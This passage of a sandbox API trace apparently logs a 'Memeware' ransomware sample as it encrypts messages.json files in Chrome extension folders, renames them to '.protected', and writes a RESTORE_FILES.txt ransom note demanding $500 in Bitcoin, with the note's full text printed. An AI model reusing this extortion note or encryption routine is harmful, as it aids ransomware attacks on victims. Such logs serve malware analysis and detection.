-1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.480] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.480] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.480] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.480] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.481] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.481] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0081.481] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.481] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0081.483] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.483] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xee, lpOverlapped=0x0) returned 1 [0081.483] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.483] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.483] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.483] CloseHandle (hObject=0x168) returned 1 [0081.483] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.protected") returned 165 [0081.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.protected")) returned 1 [0081.484] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.484] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.484] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0081.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.484] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.484] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.485] lstrlenA (lpString="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") returned 684 [0081.485] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0081.485] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.485] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.485] CloseHandle (hObject=0x164) returned 1 [0081.485] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0081.485] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0081.485] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned 141 [0081.485] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0081.485] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0081.485] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*") returned 143 [0081.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.486] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.486] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\.") returned 143 [0081.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\..") returned 144 [0081.486] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.486] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.486] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.486] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.487] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.487] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json") returned 155 [0081.487] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.487] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.487] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.487] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.487] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.488] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.488] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.488] CloseHandle (hObject=0x168) returned 1 [0081.488] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.protected") returned 165 [0081.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.protected")) returned 1 [0081.489] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.489] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.489] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0081.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.489] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.489] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.490] lstrlenA (lpString="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") returned 684 [0081.490] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0081.490] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.490] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.490] CloseHandle (hObject=0x164) returned 1 [0081.490] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.490] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0081.490] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0081.490] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0081.490] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0081.490] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0081.490] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned 141 [0081.490] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0081.490] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0081.490] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*") returned 143 [0081.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.491] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.491] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.491] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.491] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.491] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\.") returned 143 [0081.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.491] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.491] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.491] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.491] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.491] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.491] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\..") returned 144 [0081.491] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.491] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.491] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.491] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.492] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
